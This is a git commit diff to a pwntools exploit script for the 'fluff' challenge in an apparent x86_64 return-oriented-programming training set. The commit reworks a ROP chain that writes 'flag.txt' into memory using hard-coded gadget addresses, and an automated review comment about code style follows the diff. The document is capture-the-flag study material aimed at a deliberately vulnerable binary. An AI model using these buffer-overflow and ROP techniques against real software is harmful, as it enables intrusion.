From 406768c5fead9fcadc9dc466da4286e5ac3c7274 Mon Sep 17 00:00:00 2001
From: Brett Weiland
Date: Fri, 18 Dec 2020 01:42:14 -0600
Subject: deleted: x86_64/badchars/core modified: x86_64/fluff/.gdb_history deleted: x86_64/fluff/core modified: x86_64/fluff/exploit.py deleted: x86_64/ret2win/core deleted: x86_64/split/core deleted: x86_64/write4/core

---
 x86_64/fluff/exploit.py | 30 ++++++++++++++----------------
 1 file changed, 14 insertions(+), 16 deletions(-)
(limited to 'x86_64/fluff/exploit.py')

diff --git a/x86_64/fluff/exploit.py b/x86_64/fluff/exploit.py
index cdf5de8..2b520d8 100755
--- a/x86_64/fluff/exploit.py
+++ b/x86_64/fluff/exploit.py
@@ -13,37 +13,35 @@ letter_lookups = {
 def write_str(dest, string, payload):
 payload += p64(0x00000000004006a3)
 payload += p64(dest)
- for c in string:
- payload += p64(0x40062a)
- payload += p64(0x4000) # if things go wrong, check endian/order
+ payload += p64(0x0000000000400610)
+ payload += p64(1)
+ payload += p64(0x40062a)
+ payload += p64(0x4000)
+ payload += p64(letter_lookups[string[0]] - 0x3ef2)
+ payload += p64(0x400628)
+ payload += p64(0x400639)
+
+ for c in string[1:]:
+ payload += p64(0x40062b)
 payload += p64(letter_lookups[c] - 0x3ef2)
- payload += p64(0x0000000000400610)
- payload += p64(0)
-
+ payload += p64(1)
 payload += p64(0x400628)
- payload += p64(0x400639)
 return(payload)
-prog = gdb.debug('./fluff', gdbscript='''
-break *pwnme + 151
-'''
-)
+prog = process('./fluff')
 payload = b''
 for c in range(40):
 payload += b'a'
 payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
 payload += p64(0x00000000004006a3)
-payload += p64(0x601be0) # set rdi
-
+payload += p64(0x601be0)
 payload += p64(0x0000000000400510)
-payload += b"\n"
 prog.sendline(payload)
-sleep(1)
-print(str(prog.recv(), 'UTF-8'))
 prog.interactive()
--
cgit v1.2.3
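Review bot: The new body of write_str repeats the same address sequence twice — once for `string[0]` using 0x40062a and once per remaining character in the `for c in string[1:]:` loop using 0x40062b — and the commit drops the only comment in the function (`# if things go wrong, check endian/order`), so nothing records why the first character needs a different entry address than the rest. Bind each repeated literal to a named module-level constant (e.g. `FIRST_ENTRY = 0x40062a` and `NEXT_ENTRY = 0x40062b`, with the real meaning in the name) and add a one-line comment above the loop stating what distinguishes the two entries. `string[0]` raises IndexError on an empty string; a guard such as `if not string: return payload` keeps the helper safe for every input. `return(payload)` reads as a call; plain `return payload` is the idiom.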